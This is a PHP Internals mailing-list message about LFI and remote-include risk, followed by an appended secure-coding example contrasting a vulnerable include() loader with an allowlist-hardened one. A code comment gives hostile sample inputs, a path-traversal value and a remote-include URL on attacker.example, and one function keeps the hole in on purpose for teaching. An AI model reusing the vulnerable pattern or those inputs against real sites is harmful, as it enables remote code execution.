Hi,

2012/4/10 Luke Scott <l...@cywh.com>:
>> It's easy to say "write correct code. don't write stupid code", but
>> we cannot enforce it in the real world.
>>
>> I'm concerned about both arbitrary script execution and arbitrary
>> information disclosure. Good examples are LFI and SQL injection
>> attacks.
>
> Uh yeah there is. I won't employ someone who insists on writing code
> like this. I don't know anyone who will. I also won't use libraries that
> have code like this. Not only is it insecure but an improper use of
> these constructs/functions.

Attackers are supposed to abuse features. Writing data into a file is an
RDBMS feature. Including a file is a PHP feature. Combined, these features
could give attackers great freedom to steal data and/or execute scripts.
What we should consider is "proper protections".

> All this has nothing to do with Tom's RFC. It has nothing to do with
> having a <?php tag or not.

https://wiki.php.net/rfc/source_files_without_opening_tag

The RFC states "This RFC proposes a way to support source code files
without <?php at the top." It has almost nothing to do with LFI
protection, though.

> I would actually suggest that require/include stop supporting remote
> files all together. But that can be a different RFC.
>
> This "security problem" isn't a problem with common sense.

Requiring/including a remote file is not bad, just like the embedded mode
of PHP is not bad. They are bad for security if they are enabled by
default or mandatory.

Regards,

--
Yasuo Ohgaki

--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
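The "proper protections" the message above argues for, shown as an added example that is not part of the thread or of any PHP RFC: a page loader written first in the vulnerable form (a request parameter flows straight into include()), then hardened so that neither a file dropped by a database with file-write privilege nor a remote URL can ever reach include(). The directory layout (pages/ under the script directory), the page names in the allowlist, and the php.ini settings quoted in the comments are assumptions made for the illustration.

```php
<?php
// Added example, not code from the mailing-list thread.
// Assumptions: page templates live in __DIR__ . '/pages' as <name>.php,
// the valid names are the ones in $allowed, and allow_url_include is Off.

declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';

// Vulnerable form: the user-controlled string is the include path.
// ?page=../../../../tmp/attacker.php (a file an RDBMS wrote via a
// file-output feature) or ?page=http://attacker.example/x.php (if
// allow_url_include=On) is included and executed as PHP.
function load_page_vulnerable(string $page): void
{
    include PAGE_DIR . '/' . $page;   // DO NOT use: LFI/RFI
}

// Hardened form: map a plain identifier through an allowlist, then
// canonicalise and confirm the result still lies inside PAGE_DIR.
// No attacker-supplied bytes are ever used as a path component.
function resolve_page(string $page, array $allowed, string $baseDir): ?string
{
    // 1. Only a short plain identifier is accepted. Slashes, dots, NUL
    //    bytes and wrapper prefixes (php://, data:, http://) all fail here.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    // 2. Allowlist: the name must be one the application ships.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 3. Containment check on the resolved path, which also catches a
    //    symlink inside pages/ that points somewhere else.
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function load_page_hardened(string $page): void
{
    // Assumed set of legitimate pages for this example.
    static $allowed = ['home', 'about', 'contact'];
    $file = resolve_page($page, $allowed, PAGE_DIR);
    if ($file === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $file;
}

// Defence in depth, independent of the code above (assumed php.ini values):
//   allow_url_include = Off   ; closes remote include outright
//   allow_url_fopen   = Off   ; if no legitimate remote reads are needed
//   open_basedir      = /var/www/app
// and do not grant the application's database account a file-write
// privilege (e.g. MySQL's FILE privilege, needed for SELECT ... INTO OUTFILE),
// so the "RDBMS writes a file, PHP includes it" chain has no first step.

load_page_hardened($_GET['page'] ?? 'home');
```

The allowlist is the real control; realpath() containment is a second check in case the directory is later populated with symlinks, and the ini settings mean that even a regression to the vulnerable loader cannot fetch code over the network.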